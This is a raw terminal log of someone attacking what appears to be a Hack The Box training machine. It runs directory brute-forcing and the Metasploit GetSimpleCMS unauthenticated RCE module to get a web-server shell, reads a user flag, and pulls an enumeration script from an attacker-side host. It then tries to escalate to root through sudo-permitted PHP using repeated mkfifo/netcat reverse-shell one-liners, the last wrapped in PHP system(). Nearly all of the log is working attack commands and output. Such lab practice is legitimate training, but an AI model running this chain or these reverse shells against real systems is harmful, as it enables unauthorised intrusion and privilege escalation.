nmap_full_scan.nmap nmap_scan.gnmap nmap_scan.xml
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ cd ..
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ ls
nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ gobuster dir -u http://10.129.230.124 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.230.124
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/admin (Status: 301) [Size: 316] [--> http://10.129.230.124/admin/]
/backups (Status: 301) [Size: 318] [--> http://10.129.230.124/backups/]
/data (Status: 301) [Size: 315] [--> http://10.129.230.124/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 318] [--> http://10.129.230.124/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 279]
/sitemap.xml (Status: 200) [Size: 431]
/theme (Status: 301) [Size: 316] [--> http://10.129.230.124/theme/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ msfconsole
Metasploit tip: View missing module options with show missing
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.4.56-dev ]
+ -- --=[ 2505 exploits - 1291 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search exploit getcms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/getsimplecms_unauth_code_exec 2019-04-28 excellent Yes GetSimpleCMS Unauthenticated RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/getsimplecms_unauth_code_exec
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show options
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type
:host:port[,type:host:port][
...]
RHOSTS yes The target host(s), see http
s://docs.metasploit.com/docs
/using-metasploit/basics/usi
ng-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoi
ng connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.78.128 yes The listen address (an interface
may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 GetSimpleCMS 3.3.15 and before
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set RHOSTS 10.129.63.204
RHOSTS => 10.129.63.204
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set LHOST tun0
LHOST => 10.10.15.44
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > check
[+] 10.129.63.204:80 - The target is vulnerable.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[-] Handler failed to bind to 10.10.15.44:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Sending stage (40004 bytes) to 10.129.63.204
[*] Meterpreter session 1 opened (10.10.15.44:4444 -> 10.129.63.204:33912) at 2025-06-24 03:35:05 -0400
id
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a back
ground thread
channel Displays information or control active
channels
close Closes a channel
detach Detach the meterpreter session (for htt
p/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
guid Get the session GUID
help Help menu
info Displays information about a Post modul
e
irb Open an interactive Ruby shell on the c
urrent session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached
to the session
pry Open the Pry debugger on the current se
ssion
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post m
odule
secure (Re)Negotiate TLV packet encryption on
the session
sessions Quickly switch to another session
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the scre
en
cd Change directory
checksum Retrieve the checksum of a file
chmod Change the permissions of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory (alias fo
r lpwd)
getwd Print working directory
lcat Read the contents of a local file to th
e screen
lcd Change local working directory
ldir List local files (alias for lls)
lls List local files
lmkdir Create new directory on local machine
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
portfwd Forward a local port to a remote servic
e
resolve Resolve a set of host names on the targ
et
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable va
lues
getpid Get the current process identifier
getuid Get the user that the server is running
as
kill Terminate a process
localtime Displays the target system local date a
nd time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote syste
m, such as OS
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on th
e target system
For more info on a specific command, use <command> -h or help <command>.
meterpreter > exit
[*] Shutting down session: 1
[*] 10.129.63.204 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect . normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom . normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/multi/meterpreter/reverse_http . normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
7 payload/multi/meterpreter/reverse_https . normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
8 payload/php/bind_perl . normal No PHP Command Shell, Bind TCP (via Perl)
9 payload/php/bind_perl_ipv6 . normal No PHP Command Shell, Bind TCP (via perl) IPv6
10 payload/php/bind_php . normal No PHP Command Shell, Bind TCP (via PHP)
11 payload/php/bind_php_ipv6 . normal No PHP Command Shell, Bind TCP (via php) IPv6
12 payload/php/download_exec . normal No PHP Executable Download and Execute
13 payload/php/exec . normal No PHP Execute Command
14 payload/php/meterpreter/bind_tcp . normal No PHP Meterpreter, Bind TCP Stager
15 payload/php/meterpreter/bind_tcp_ipv6 . normal No PHP Meterpreter, Bind TCP Stager IPv6
16 payload/php/meterpreter/bind_tcp_ipv6_uuid . normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
17 payload/php/meterpreter/bind_tcp_uuid . normal No PHP Meterpreter, Bind TCP Stager with UUID Support
18 payload/php/meterpreter/reverse_tcp . normal No PHP Meterpreter, PHP Reverse TCP Stager
19 payload/php/meterpreter/reverse_tcp_uuid . normal No PHP Meterpreter, PHP Reverse TCP Stager
20 payload/php/meterpreter_reverse_tcp . normal No PHP Meterpreter, Reverse TCP Inline
21 payload/php/reverse_perl . normal No PHP Command, Double Reverse TCP Connection (via Perl)
22 payload/php/reverse_php . normal No PHP Command Shell, Reverse TCP (via PHP)
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > set payload 4
payload => generic/shell_reverse_tcp
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 10.10.15.44:4444
[*] Command shell session 2 opened (10.10.15.44:4444 -> 10.129.63.204:33924) at 2025-06-24 03:35:54 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@gettingstarted:/var/www/html/theme$ ls
ls
Cardinal Innovation dFJMmjuOgysIkU.php naNjathzIqT.php
www-data@gettingstarted:/var/www/html/theme$ cd
cd
bash: cd: HOME not set
www-data@gettingstarted:/var/www/html/theme$ ls
ls
Cardinal Innovation dFJMmjuOgysIkU.php naNjathzIqT.php
www-data@gettingstarted:/var/www/html/theme$ cd ..
cd ..
www-data@gettingstarted:/var/www/html$ ls
ls
LICENSE.txt backups gsconfig.php plugins robots.txt theme
admin data index.php readme.txt sitemap.xml
www-data@gettingstarted:/var/www/html$ cd ..
cd ..
www-data@gettingstarted:/var/www$ ls
ls
html
www-data@gettingstarted:/var/www$ cd ..
cd ..
www-data@gettingstarted:/var$ ls
ls
backups crash local log opt snap tmp
cache lib lock mail run spool www
www-data@gettingstarted:/var$ cd ..
cd ..
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ cd /home
cd /home
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd mrb3n
cd mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ cat user.txt
cat user.txt
7002d65b149b0a4d19132a66feed21d8
www-data@gettingstarted:/home/mrb3n$ wget 10.10.15.44:8000/LinEnum.sh
wget 10.10.15.44:8000/LinEnum.sh
--2025-06-24 07:38:10-- http://10.10.15.44:8000/LinEnum.sh
Connecting to 10.10.15.44:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied
Cannot write to ‘LinEnum.sh’ (Permission denied).
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ cd /usr/bin/
cd /usr/bin/
www-data@gettingstarted:/usr/bin$ ls
ls
NF nice
VGAuthService nisdomainname
'[' nl
aa-enabled nohup
aa-exec nproc
ab nroff
add-apt-repository nsenter
addpart nslookup
apport-bug nstat
apport-cli nsupdate
apport-collect ntfs-3g
apport-unpack ntfs-3g.probe
apropos ntfscat
apt ntfscluster
apt-add-repository ntfscmp
apt-cache ntfsdecrypt
apt-cdrom ntfsfallocate
apt-config ntfsfix
apt-extracttemplates ntfsinfo
apt-ftparchive ntfsls
apt-get ntfsmove
apt-key ntfsrecover
apt-mark ntfssecaudit
apt-sortpkgs ntfstruncate
arch ntfsusermap
at ntfswipe
atq numfmt
atrm od
automat-visualize3 oem-getlogs
awk on_ac_power
b2sum openssl
base32 openvt
base64 os-prober
basename pager
bash partx
bashbug passwd
batch paste
bc pastebinit
boltctl patch
bootctl pathchk
bsd-from pbget
bsd-write pbput
btrfs pbputs
btrfs-convert pdb3
btrfs-find-root pdb3.8
btrfs-image peekfd
btrfs-map-logical perl
btrfs-select-super perl5.30-x86_64-linux-gnu
btrfsck perl5.30.0
btrfstune perlbug
bunzip2 perldoc
busctl perlivp
busybox perlthanks
byobu perror
byobu-config pftp
byobu-ctrl-a pgrep
byobu-disable phar
byobu-disable-prompt phar.phar
byobu-enable phar.phar7.4
byobu-enable-prompt phar7.4
byobu-export php
byobu-janitor php7.4
byobu-keybindings pic
byobu-launch pico
byobu-launcher piconv
byobu-launcher-install pidof
byobu-launcher-uninstall pinentry
byobu-layout pinentry-curses
byobu-prompt ping
byobu-quiet ping4
byobu-reconnect-sockets ping6
byobu-screen pinky
byobu-select-backend pkaction
byobu-select-profile pkcheck
byobu-select-session pkcon
byobu-shell pkexec
byobu-silent pkill
byobu-status pkmon
byobu-status-detail pkttyagent
byobu-tmux pl2pm
byobu-ugraph pldd
byobu-ulevel plymouth
bzcat pmap
bzcmp pod2html
bzdiff pod2man
bzegrep pod2text
bzexe pod2usage
bzfgrep podchecker
bzgrep podselect
bzip2 pollinate
bzip2recover pr
bzless preconv
bzmore print
c_rehash printenv
cal printerbanner
calendar printf
captoinfo prlimit
cat prove
catchsegv prtstat
catman ps
cautious-launcher psfaddtable
cftp3 psfgettable
chage psfstriptable
chardet3 psfxtable
chardetect3 pslog
chattr pstree
chcon pstree.x11
check-language-support ptar
checkgid ptardiff
chfn ptargrep
chgrp ptx
chmod purge-old-kernels
choom pwd
chown pwdx
chrt py3clean
chsh py3compile
chvt py3versions
ckbcomp pydoc3
ckeygen3 pydoc3.8
cksum pygettext3
clear pygettext3.8
clear_console pyhtmlizer3
cmp pyjwt3
codepage python3
col python3.8
col1 rbash
col2 rcp
col3 rdma
col4 readlink
col5 realpath
col6 red
col7 rename.ul
col8 renice
col9 rescan-scsi-bus.sh
colcrt reset
colrm resizecons
column resizepart
comm resolvectl
compose rev
conch3 rgrep
corelist rlogin
cp rm
cpan rmdir
cpan5.30-x86_64-linux-gnu rnano
cpio rotatelogs
crontab routef
csplit routel
ctail rpcgen
ctstat rrsync
curl rsh
cut rsync
cvtsudoers rtstat
dash run-mailcap
date run-one
dbus-cleanup-sockets run-one-constantly
dbus-daemon run-one-until-failure
dbus-monitor run-one-until-success
dbus-run-session run-parts
dbus-send run-this-one
dbus-update-activation-environment runcon
dbus-uuidgen rview
dd rvim
deallocvt savelog
deb-systemd-helper sbattach
deb-systemd-invoke sbkeysync
debconf sbsiglist
debconf-apt-progress sbsign
debconf-communicate sbvarsign
debconf-copydb sbverify
debconf-escape scp
debconf-set-selections screen
debconf-show screendump
delpart script
delv scriptreplay
df scsi_logging_level
dfu-tool scsi_mandat
dh_bash-completion scsi_readcap
diff scsi_ready
diff3 scsi_satl
dig scsi_start
dir scsi_stop
dircolors scsi_temperature
dirmngr sdiff
dirmngr-client sed
dirname see
dmesg select-editor
dnsdomainname sensible-browser
do-release-upgrade sensible-editor
domainname sensible-pager
dpkg seq
dpkg-deb setarch
dpkg-divert setfont
dpkg-maintscript-helper setkeycodes
dpkg-query setleds
dpkg-split setlogcons
dpkg-statoverride setmetamode
dpkg-trigger setpci
du setpriv
dumpkeys setsid
ec2metadata setterm
echo setupcon
ed sftp
edit sg
editor sg_bg_ctl
egrep sg_compare_and_write
eject sg_copy_results
enc2xs sg_dd
encguess sg_decode_sense
env sg_emc_trespass
envsubst sg_format
eqn sg_get_config
ex sg_get_lba_status
expand sg_ident
expiry sg_inq
expr sg_logs
factor sg_luns
faillog sg_map
fallocate sg_map26
false sg_modes
fcgistarter sg_opcodes
fgconsole sg_persist
fgrep sg_prevent
file sg_raw
finalrd sg_rbuf
fincore sg_rdac
find sg_read
findmnt sg_read_attr
flock sg_read_block_limits
fmt sg_read_buffer
fold sg_read_long
free sg_readcap
from sg_reassign
ftp sg_referrals
funzip sg_rep_zones
fuser sg_requests
fusermount sg_reset
fwupdagent sg_reset_wp
fwupdate sg_rmsn
fwupdmgr sg_rtpg
fwupdtool sg_safte
fwupdtpmevlog sg_sanitize
gapplication sg_sat_identify
gawk sg_sat_phy_event
gdbus sg_sat_read_gplog
gencat sg_sat_set_features
geqn sg_scan
getconf sg_seek
getent sg_senddiag
getkeycodes sg_ses
getopt sg_ses_microcode
gettext sg_start
gettext.sh sg_stpg
ginstall-info sg_stream_ctl
gio sg_sync
gio-querymodules sg_test_rwbuf
git sg_timestamp
git-receive-pack sg_turs
git-shell sg_unmap
git-upload-archive sg_verify
git-upload-pack sg_vpd
glib-compile-schemas sg_wr_mode
gpasswd sg_write_buffer
gpg sg_write_long
gpg-agent sg_write_same
gpg-connect-agent sg_write_verify
gpg-wks-server sg_write_x
gpg-zip sg_xcopy
gpgcompose sg_zone
gpgconf sginfo
gpgparsemail sgm_dd
gpgsm sgp_dd
gpgsplit sh
gpgtar sha1sum
gpgv sha224sum
gpic sha256sum
grep sha384sum
gresource sha512sum
groff shasum
grog showconsolefont
grops showkey
grotty shred
groups shuf
growpart skill
grub-editenv slabtop
grub-file sleep
grub-fstest slogin
grub-glue-efi snap
grub-kbdcomp snapctl
grub-menulst2cfg snapfuse
grub-mkfont snice
grub-mkimage soelim
grub-mklayout sort
grub-mknetdir sos
grub-mkpasswd-pbkdf2 sos-collector
grub-mkrelpath sosreport
grub-mkrescue sotruss
grub-mkstandalone splain
grub-mount split
grub-ntldr-img splitfont
grub-render-label sprof
grub-script-check ss
grub-syslinux2cfg ssh
gsettings ssh-add
gtbl ssh-agent
gunzip ssh-argv0
gzexe ssh-copy-id
gzip ssh-import-id
h2ph ssh-import-id-gh
h2xs ssh-import-id-lp
hd ssh-keygen
head ssh-keyscan
helpztags stat
hexdump static-sh
host stdbuf
hostid strace
hostname strace-log-merge
hostnamectl stty
htcacheclean su
htdbm sudo
htdigest sudoedit
htop sudoreplay
htpasswd sum
hwe-support-status symcryptrun
i386 sync
ibd2sdi systemctl
iconv systemd
id systemd-analyze
info systemd-ask-password
infobrowser systemd-cat
infocmp systemd-cgls
infotocap systemd-cgtop
innochecksum systemd-delta
install systemd-detect-virt
install-info systemd-escape
instmodsh systemd-hwdb
ionice systemd-id128
ip systemd-inhibit
ipcmk systemd-machine-id-setup
ipcrm systemd-mount
ipcs systemd-notify
iptables-xml systemd-path
ischroot systemd-resolve
iscsiadm systemd-run
join systemd-socket-activate
journalctl systemd-stdio-bridge
json_pp systemd-sysusers
kbd_mode systemd-tmpfiles
kbdinfo systemd-tty-ask-password-agent
kbxutil systemd-umount
keep-one-running tabs
kernel-install tac
keyring tail
kill tar
killall taskset
kmod tbl
kmodsign tee
landscape-sysinfo telnet
last telnet.netkit
lastb tempfile
lastlog test
lcf tic
ldd time
less timedatectl
lessecho timeout
lessfile tkconch3
lesskey tload
lesspipe tmux
lexgrog toe
libnetcfg top
link touch
linux-boot-prober tput
linux-check-removal tr
linux-update-symlinks tracepath
linux-version traceroute6
linux32 traceroute6.iputils
linux64 trial3
ln troff
lnstat true
loadkeys truncate
loadunimap tset
locale tsort
locale-check tty
localectl twist3
localedef twistd3
logger tzselect
login ua
loginctl ubuntu-advantage
logname ubuntu-bug
logresolve ubuntu-core-launcher
look ubuntu-security-status
lorder ucf
lowntfs-3g ucfq
ls ucfr
lsattr udevadm
lsb_release ul
lsblk ulockmgr_server
lscpu umount
lshw uname
lsinitramfs uncompress
lsipc unexpand
lslocks unicode_start
lslogins unicode_stop
lsmem uniq
lsmod unlink
lsns unlz4
lsof unlzma
lspci unmkinitramfs
lspgpot unshare
lsusb unsquashfs
ltrace unxz
lz4 unzip
lz4c unzipsfx
lz4cat update-alternatives
lzcat update-mime-database
lzcmp uptime
lzdiff usb-devices
lzegrep usbhid-dump
lzfgrep usbreset
lzgrep users
lzless utmpdump
lzma uuidgen
lzmainfo uuidparse
lzmore vcs-run
mailmail3 vdir
man vi
man-recode view
mandb vigpg
manifest vim
manpath vim.basic
mapscrn vim.tiny
mawk vimdiff
mcookie vimtutor
md5sum vmhgfs-fuse
md5sum.textutils vmstat
mdig vmtoolsd
mesg vmware-checkvm
migrate-pubring-from-classic-gpg vmware-hgfsclient
miniterm vmware-namespace-cmd
mk_modmap vmware-rpctool
mkdir vmware-toolbox-cmd
mkfifo vmware-vgauth-cmd
mknod vmware-vgauth-smoketest
mksquashfs vmware-vmblock-fuse
mktemp vmware-xferlogs
more volname
mount w
mountpoint w.procps
mt wall
mt-gnu watch
mtr watchgnupg
mtr-packet wc
mtrace wdctl
mv wget
my_print_defaults whatis
myisam_ftdump whereis
myisamchk which
myisamlog whiptail
myisampack who
mysql whoami
mysql_config_editor wifi-status
mysql_secure_installation write
mysql_ssl_rsa_setup x86_64
mysql_tzinfo_to_sql xargs
mysql_upgrade xauth
mysqladmin xdg-user-dir
mysqlanalyze xdg-user-dirs-update
mysqlbinlog xsubpp
mysqlcheck xxd
mysqld_multi xz
mysqld_safe xzcat
mysqldump xzcmp
mysqldumpslow xzdiff
mysqlimport xzegrep
mysqloptimize xzfgrep
mysqlpump xzgrep
mysqlrepair xzless
mysqlreport xzmore
mysqlshow yes
mysqlslap ypdomainname
namei zcat
nano zcmp
nawk zdiff
nc zdump
nc.openbsd zegrep
ncal zfgrep
neqn zforce
netcat zgrep
netkit-ftp zipdetails
netstat zipgrep
networkctl zipinfo
networkd-dispatcher zless
newgrp zmore
ngettext znew
www-data@gettingstarted:/usr/bin$ cd
cd
bash: cd: HOME not set
www-data@gettingstarted:/usr/bin$ cd ..
cd ..
www-data@gettingstarted:/usr$ cd ..
cd ..
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ sudo /usr/bin/php ^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/$
www-data@gettingstarted:/$ /usr/bin/phop
/usr/bin/phop
bash: /usr/bin/phop: No such file or directory
www-data@gettingstarted:/$ /usr/bin/php
/usr/bin/php
l
l
exit
exit
system("id);
system("id);
system("id");
system("id");
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/$
www-data@gettingstarted:/$ man /usr/bin/php
man /usr/bin/php
WARNING: terminal is not fully functional
- (press RETURN)
php(1) Scripting Language php(1)
NAME
php - PHP Command Line Interface 'CLI'
php-cgi - PHP Common Gateway Interface 'CGI' command
SYNOPSIS
php [options] [ -f ] file [[--] args...]
php [options] -r code [[--] args...]
php [options] [-B begin_code] -R code [-E end_code] [[--] args...]
php [options] [-B begin_code] -F file [-E end_code] [[--] args...]
php [options] -- [ args...]
php [options] -a
php [options] -S addr:port [-t docroot]
DESCRIPTION
Manual page php(1) line 1 (press h for help or q to quit)q
www-data@gettingstarted:/$
www-data@gettingstarted:/$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f" > payload.php
<h -i 2>&1|nc 10.10.14.2 9443 >/tmp/f" > payload.php
bash: payload.php: Permission denied
www-data@gettingstarted:/$ touch payload.php
touch payload.php
touch: cannot touch 'payload.php': Permission denied
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ cd /home
cd /home
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd mrb3n
ls
cd mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
user.txt
www-data@gettingstarted:/home/mrb3n$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
<sercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2025-06-24 07:42:44-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... ^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ clear
clear
TERM environment variable not set.
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ cd ..
cd ..
www-data@gettingstarted:/home$ ls
ls
mrb3n
www-data@gettingstarted:/home$ cd ..
cd ..
www-data@gettingstarted:/$ ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
www-data@gettingstarted:/$ cd /home/mrb3n
cd /home/mrb3n
www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ /usr/bin/php -r "echo 1"
/usr/bin/php -r "echo 1"
PHP Parse error: syntax error, unexpected end of file, expecting ';' or ',' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ /usr/bin/php -r "echo 1;"
/usr/bin/php -r "echo 1;"
1www-data@gettingstarted:/home/mrb3n$ ls
ls
user.txt
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f"^[[D^^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f"^[[D^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
</tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
PHP Parse error: syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ sudo -l
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r 'echo function_exists("foo") ? "yes" : "no";'
<hp -r 'echo function_exists("foo") ? "yes" : "no";'
nowww-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php
sudo /usr/bin/php
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -a
sudo /usr/bin/php -a
Interactive mode enabled
No entry for terminal type "unknown";
using dumb terminal settings.
php > echo function_exists("foo") ? "yes" : "no";
echo function_exists("foo") ? "yes" : "no";
no
php > rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/t
mp/f
php > rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/t
mp/f
php > exit
exit
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
</tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443 >/tmp/f"
PHP Parse error: syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443"
<p/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.44 8443"
PHP Parse error: syntax error, unexpected '/' in Command line code on line 1
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
<| /bin/sh -i 2>&1 | nc 10.10.15.44 8443 >/tmp/f');"
rm: cannot remove '/tmp/f': No such file or directory
^C
Abort session 2? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
